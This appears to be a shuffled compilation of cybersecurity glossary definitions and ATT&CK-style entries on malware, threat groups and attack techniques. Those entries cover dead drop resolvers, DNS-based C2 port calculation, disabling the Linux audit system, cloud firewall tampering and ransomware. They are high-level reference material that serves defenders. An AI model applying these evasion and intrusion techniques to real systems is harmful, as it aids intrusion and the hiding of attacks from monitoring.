Description: Olympic Destroyer is malware that was used by Sandworm Team against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. Olympic Destroyer has worm-like features to spread itself across a computer network in order to maximize its destructive impact.

Term: re-identification probability
Definition: The probability that an individual’s identity will be correctly inferred by an outside party using information contained in a de-identified dataset.

Term: CP
Definition: A named set of rules that indicates the applicability of a certificate to a particular community and/or class of application with common security requirements. For example, a particular CP might indicate applicability of a type of certificate to the authentication of parties engaging in business-to-business transactions for the trading of goods or services within a given price range.

Name: Dead Drop Resolver
Type: attack-pattern
Description: Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

Term: Key-derivation key
Definition: A key used as an input to a key-derivation method to derive other keys. See [NIST SP 800-108].

Term: Live Entropy Source
Definition: An approved entropy source (see [NIST SP 800-90B]) that can provide an RBG with bits having a specified amount of entropy immediately upon request or within an acceptable amount of time, as determined by the user or application relying upon that RBG.

Term: descriptive label
Definition: Provides facts about properties or features of a product without any grading or evaluation. Information may be displayed in a variety of ways, such as in tabular format or with icons or text.

Term: key transport
Definition: A key-establishment procedure whereby one party (the sender) selects a value for the secret keying material and then securely distributes that value to another party (the receiver) using an asymmetric algorithm.

Term: SSP
Definition: Formal document that provides an overview of the security requirements for an information system and describes the security controls in place or planned for meeting those requirements.

Term: <em>q</em>
Definition: When used as an ECC domain parameter, <i>q</i> is the field size. It is either an odd prime <i>p</i> or equal to 2<i><sup>m</sup></i>, for some prime integer <i>m</i>.

Term: Device
Definition: A combination of components that function together to serve a specific purpose.

Name: APT12
Type: intrusion-set
Description: APT12 is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.

Term: membership-inference attack
Definition: A data privacy attack to determine whether a data sample was part of the training set of a machine learning model.

Name: Stage Capabilities
Type: attack-pattern
Description: Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed (Develop Capabilities) or obtained (Obtain Capabilities) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary (Acquire Infrastructure) or was otherwise compromised by them (Compromise Infrastructure). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.

Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):

* Staging web resources necessary to conduct Drive-by Compromise when a user browses to a site.
* Staging web resources for a link target to be used with spearphishing.
* Uploading malware or tools to a location accessible to a victim network to enable Ingress Tool Transfer.
* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: Asymmetric Cryptography with Web Protocols).

Term: Key Management Plan
Definition: The Key Management Plan is the document that describes for a cryptographic device or application the management of all key management products and services distributed by the Key Management Infrastructure and employed by that cryptographic device or application. The Key Management Plan documents how current and/or planned key management products and services will be supplied by the Key Management Infrastructure and used by the cryptographic application to ensure that lifecycle key management support is available.

Term: message authentication code (MAC)
Definition: A cryptographic checksum based on an approved cryptographic function and a symmetric key to detect both accidental and intentional modifications of data.

Term: consequence
Definition: Effect (change or non-change), usually associated with an event or condition or with the system and usually allowed, facilitated, caused, prevented, changed, or contributed to by the event, condition, or system.

Term: Active state
Definition: The key state in which the key may be used to cryptographically protect information (e.g., encrypt plaintext or generate a digital signature), cryptographically process previously protected information (e.g., decrypt ciphertext or verify a digital signature), or both.

Name: SSH
Type: attack-pattern
Description: Adversaries may use Valid Accounts to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.

SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., SSH Authorized Keys).

Term: reconstruction attack
Definition: A privacy attack that uses published statistics to reconstruct individual data points from the original private dataset.

Term: <em>Digitization</em>
Definition: The process of generating bits from the noise source.

Term: Information System User
Definition: See Information System User

Term: SHA
Definition: Secure Hash Algorithm.

Term: role-based access control (RBAC)
Definition: mapped to job function, assumes that a person will take on different roles, overtime, within an organization and different responsibilities in relation to IT systems.

Term: data universe
Definition: All possible data within a specified domain.

Term: attack surface
Definition: The set of points on the boundary of a system, a system element, or an environment where an attacker can try to enter, cause an effect on, or extract data from that system, system element, or environment.

Term: DMZ
Definition: A perimeter network or screened subnet separating an internal network that is more trusted from an external network that is less trusted.

Term: security control assessment
Definition: See Security Control Assessment or Privacy Control Assessment.

Term: Key Management Policy
Definition: A high-level statement of organizational key management policies that identifies a high-level structure, responsibilities, governing standards, organizational dependencies and other relationships, and security policies.

Term: <strong>Should</strong>
Definition: Used to indicate a highly desirable feature for a DRBG mechanism that is not necessarily required by this Recommendation. "Should" may be coupled with "not" to become "should not."

Term: Certificate Authority (CA)
Definition: The entity in a Public Key Infrastructure (PKI) that is responsible for issuing public-key certificates and exacting compliance to a PKI policy. Also known as a Certification Authority.

Term: Automated Access
Definition: Access to a computer by an automated process without an interactive user, generally machine-to-machine access. Automated access is often triggered from scripts or schedulers, e.g., by executing an SSH client or a file transfer application. Many programs may also use automated access using SSH internally, including many privileged access management systems and systems management tools.

Term: specification
Definition: The requirements for the security-relevant portion of the system.

Term: identity proofing
Definition: The process by which a CSP collects, validates, and verifies information about a person.

Term: FCKMS services (protections)
Definition: Protections provided to data, such as data integrity authentication, confidentiality, and source authentication.

Name: DNS Calculation
Type: attack-pattern
Description: Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.

One implementation of DNS Calculation is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.

Term: <strong>Shall</strong>
Definition: A requirement that must be met unless a justification of why it cannot be met is given and accepted.

Term: White Box Testing
Definition: See Comprehensive Testing.

Name: SnappyTCP
Type: malware
Description: SnappyTCP is a web shell used by Sea Turtle between 2021 and 2023 against multiple victims. SnappyTCP appears to be based on a public GitHub project that has since been removed from the code-sharing site. SnappyTCP includes a simple reverse TCP shell for Linux and Unix environments with basic command and control capabilities.

Term: PIP
Definition: Serves as the retrieval source of attributes, or the data required for policy evaluation to provide the information needed by the policy decision point to make the decisions.

Term: Global System for Mobile Communications (GSM)
Definition: A set of standards for second generation, cellular networks currently maintained by the 3rd Generation Partnership Project (3GPP).

Name: KOMPROGO
Type: malware
Description: KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management.

Name: Data Encrypted for Impact
Type: attack-pattern
Description: Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.

In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as File and Directory Permissions Modification or System Shutdown/Reboot, in order to unlock and/or gain access to manipulate these files. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR. Adversaries may also encrypt virtual machines hosted on ESXi or other hypervisors. 

To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares. Encryption malware may also leverage Internal Defacement, such as changing victim wallpapers or ESXi server login messages, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").

In cloud environments, storage objects within compromised accounts may also be encrypted. For example, in AWS environments, adversaries may leverage services such as AWS’s Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt data.

Term: Access Control Matrix
Definition: A table in which each row represents a subject, each column represents an object, and each entry is the set of access rights for that subject to that object.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact organizational operations, organizational assets, individuals, other organizations, or the Nation through a system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.

Term: Brute Force Password Attack
Definition: in cryptography, an attack that involves trying all possible combinations to find a match

Term: computer network attack (CNA)
Definition: Actions taken through the use of computer networks to disrupt, deny, degrade, or destroy information resident in computers and computer networks, or the computers and networks themselves. 
Note: Within DoD, Joint Publication 3-13, "Information Operations, " 27 November 2012 approved the removal the terms and definitions of computer network attack (CNA), computer network defense (CND), computer network exploitation, and computer network operations (CNO) from JP -1-02, "Department of Defense Dictionary of Military Terms and Associated Terms." This term and definition is no longer published in JP 1-02. This publication is the primary terminology source when preparing correspondence, to include policy, strategy, doctrine, and planning documents. The terms are no longer used in issuances being updated within DoD. JP 1-02, following publication of JP 3-12, "Cyberspace Operations" provides new terms and definitions such as cyberspace, cyberspace operations, cyberspace superiority, defensive cyberspace operation response action, defensive cyberspace operations, Department of Defense information network operations, and offensive cyberspace operations.

Term: ISAO
Definition: An ISAO is any entity or collaboration created or employed by public- or private sector organizations, for purposes of gathering and analyzing critical cyber and related information in order to better understand security problems and interdependencies related to cyber systems, so as to ensure their availability, integrity, and reliability.

Term: Usability
Definition: Per ISO/IEC 9241-11: Extent to which a product can be used by specified users to achieve specified goals with effectiveness, efficiency, and satisfaction in a specified context of use.

Term: EOT
Definition: A method for strengthening adversarial examples to re­main adversarial under image transformations that occur in the real world, such as angle and viewpoint changes. EOT models these perturbations within the opti­mization procedure. Rather than optimizing the log-likelihood of a single example, EOT uses a chosen distribution of transformation functions that take an input con­trolled by the adversary to the “true” input perceived by the classifier.

Term: security architecture
Definition: A set of physical and logical security-relevant representations (i.e., views) of system architecture that conveys information about how the system is partitioned into security domains and makes use of security-relevant elements to enforce security policies within and between security domains based on how data and information must be protected. Note: The security architecture reflects security domains, the placement of security-relevant elements within the security domains, the interconnections and trust relationships between the security-relevant elements, and the behavior and interaction between the security-relevant elements. The security architecture, similar to the system architecture, may be expressed at different levels of abstraction and with different scopes.

Name: IPsec Helper
Type: malware
Description: IPsec Helper is a post-exploitation remote access tool linked to Agrius operations. This malware shares significant programming and functional overlaps with Apostle ransomware, also linked to Agrius. IPsec Helper provides basic remote access tool functionality such as uploading files from victim systems, running commands, and deploying additional payloads.

Name: Moafee
Type: intrusion-set
Description: Moafee is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group DragonOK.

Term: Domain Separation
Definition: For a function, a partitioning of the inputs to different application domains so that no input is assigned to more than one domain.

Term: Trusted Execution Environment
Definition: An area or enclave protected by a system processor.

Name: InvisibleFerret
Type: malware
Description: InvisibleFerret is a modular python malware that is leveraged for data exfiltration and remote access capabilities. InvisibleFerret consists of four modules: main, payload, browser, and AnyDesk. InvisibleFerret malware has been leveraged by North Korea-affiliated threat actors identified as DeceptiveDevelopment or Contagious Interview since 2023. InvisibleFerret has historically been introduced to the victim environment through the use of the BeaverTail malware.

Term: FCSM
Definition: An interagency committee dedicated to improving the quality of Federal statistics. The FCSM was created by the Office of Management and Budget (OMB) to inform and advise OMB and the Interagency Council on Statistical Policy (ICSP) on methodological and statistical issues that affect the quality of Federal data.

Term: federal agency
Definition: Any department, subordinate element of a department, or independent organizational entity that is statutorily or constitutionally recognized as being part of the Executive Branch of the Federal Government.

Term: Write Once, Read Many
Definition: Write-Once Read Many. 
Also see CD-R.

Term: Local Defect Checks
Definition: The defect checks that an organization adds to Foundational defect checks based on an assessment of its own needs and risk tolerance. A local defect check supports or strengthens the Foundational defect checks. Agencies might choose not to apply a given local defect check in cases where the supporting controls have not been selected/implemented.

Term: crypto agility
Definition: The capabilities needed to replace and adapt cryptographic algorithms in protocols, applications, software, hardware, firmware, and infrastructures while preserving security and ongoing operations.

Name: Cloud Firewall
Type: attack-pattern
Description: Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources.

Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary with appropriate permissions may introduce new firewall rules or policies to allow access into a victim cloud environment and/or move laterally from the cloud control plane to the data plane.

For example, an adversary may use a script or utility that creates new ingress rules in existing security groups (or creates new security groups entirely) to allow any TCP/IP connectivity to a cloud-hosted instance. They may also remove networking limitations to support traffic associated with malicious activity (such as cryptomining).

Term: Round robin consensus model
Definition: A consensus model for permissioned blockchain networks where nodes are pseudo-randomly selected to create blocks, but a node must wait several block-creation cycles before being chosen again to add another new block. This model ensures that no one participant creates the majority of the blocks, and it benefits from a straightforward approach, lacking cryptographic puzzles, and having low power requirements.

Term: MAC
Definition: A means of restricting access to objects based on the sensitivity (as represented by a security label) of the information contained in the objects and the formal authorization (i.e., clearance, formal access approvals, and need-to-know) of subjects to access information of such sensitivity. Mandatory Access Control is a type of nondiscretionary access control.

Term: CD
Definition: A Compact Disc(CD)is a class of media from which data are readby optical means.

Term: firmware
Definition: Computer programs and data stored in hardware—typically in read-only memory (ROM) or programmable read-only memory (PROM)—such that programs and data cannot be dynamically written or modified during execution of the programs. See hardware and software.

Term: Pseudorandom
Definition: A deterministic process (or data produced by such a process) whose output values are effectively indistinguishable from those of a random process as long as the internal states and internal actions of the process are unknown. For cryptographic purposes, “effectively indistinguishable” means “not within the computational limits established by the intended security strength.”

Term: Cyber Threat
Definition: Potential cause of unacceptable asset loss and the undesirable consequences or impact of such a loss.

Term: One-to-one
Definition: Of or relating to biometric verification in which submitted feature data is compared with that of one, claimed, identity.

Term: File Slack
Definition: Space between the logical end of the file and the end of the last allocation unit for that file.

Term: Integrity authentication
Definition: The protection obtained for transmitted or stored data using an authentication code (e.g., MAC) or digital signature computed on that data. See Integrity authentication.

Term: PKI-PIV Authentication (PKI-AUTH)
Definition: A PIV authentication mechanism that is implemented by an asymmetric key challenge/response protocol using the PIV authentication key of the PIV Card and a contact reader or a contactless card reader that supports the virtual contact interface.

Name: Disable or Modify Linux Audit System Log
Type: attack-pattern
Description: Adversaries may disable or modify the Linux Audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules. 

Often referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time.

With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.

Term: assessment object
Definition: The item (i.e., specifications, mechanisms, activities, individuals) upon which an assessment method is applied during an assessment.

Term: ethernet data encryption cryptographic interoperability specification (EDE-CIS)
Definition: A standard defining the requirements for Ethernet encryption, similar to HAIPE but for layer 2 Ethernet devices.

Term: Random value
Definition: A sufficient entropy bit string.

Name: APT37
Type: intrusion-set
Description: APT37 is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. APT37 has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.

Term: data integrity
Definition: A property whereby data has not been altered in an unauthorized manner since it was created, transmitted, or stored.

Term: public key certificate
Definition: A digital document issued and digitally signed by the private key of a certificate authority that binds an identifier to a subscriber to a public key. The certificate indicates that the subscriber identified in the certificate has sole control and access to the private key. See also Request for Comment 5280.

Term: damage-limiting operations
Definition: Procedural and operational measures that use system capabilities to maximize the ability of an organization to detect successful system compromises by an adversary and to limit the effects of such compromises (both detected and undetected).

Term: purge
Definition: A method of Sanitization by applying physical or logical techniques that renders Target Data recovery infeasible using state of the art laboratory techniques.

Term: CoT
Definition: See “authentication chain.”

Term: Adjudicative Entity
Definition: An agency authorized by law, Executive Order, designation by the Security Executive Agent, or delegation by the Suitability &amp; Credentialing Executive Agent to make an adjudication. Adjudication has the meaning provided in [Executive Order 13764], “(a) ‘Adjudication’ means the evaluation of pertinent data in a background investigation, as well as any other available information that is relevant and reliable, to determine whether a covered individual is: (i) suitable for Government employment; (ii) eligible for logical and physical access; (iii) eligible for access to classified information; (iv) eligible to hold a sensitive position; or (v) fit to perform work for or on behalf of the Government as a Federal employee, contractor, or non-appropriated fund employee.”

Term: Security Association (SA)
Definition: Set of values that define the features and protections applied to a connection.

Term: cryptographic key
Definition: A parameter that determines the transformation using DEA and TDEA forward and inverse operations.

Term: trade-off analysis
Definition: Determining the effect of decreasing one or more key factors and simultaneously increasing one or more other key factors in a decision, design, or project.

Name: Email Accounts
Type: attack-pattern
Description: Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct Phishing for Information, Phishing, or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: Domains).

A variety of methods exist for compromising email accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials. Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or Phishing emails may evade reputation-based email filtering rules.

Adversaries can use a compromised email account to hijack existing email threads with targets of interest.

Term: Authorized individuals, services, and other IoT product components
Definition: An entity (i.e., a person, device, service, network, domain, developer, or other party who might interact with an IoT device) that has implicitly or explicitly been granted approval to interact with a particular IoT device.

Term: authenticate
Definition: A process that provides assurance of the source and integrity of information that is communicated or stored or the identity of an entity interacting with a system.

Term: BD
Definition: A Blu-ray Disc(BD) hasthe same shape and size as a CD or DVD,but has a higher density and gives the option for data to be multi-layered.

Term: network access
Definition: Access to a system by a user (or a process acting on behalf of a user) communicating through a network (e.g., a local area network, a wide area network, and Internet).

Term: cryptology
Definition: The science that deals with hidden, disguised, or encrypted communications. It includes communications security and communications intelligence.

Term: agility
Definition: The property of a system or an infrastructure which can be reconfigured, in which resources can be reallocated, and in which components can be reused or repurposed, so that cyber defenders can define, select, and tailor cyber courses of action for a broad range of disruptions or malicious cyber activities.

Term: Owner
Definition: For a static key pair, the entity that is associated with the public key and authorized to use the private key. For an ephemeral key pair, the owner is the entity that generated the public/private key pair. For a symmetric key, any entity that is authorized to use the key.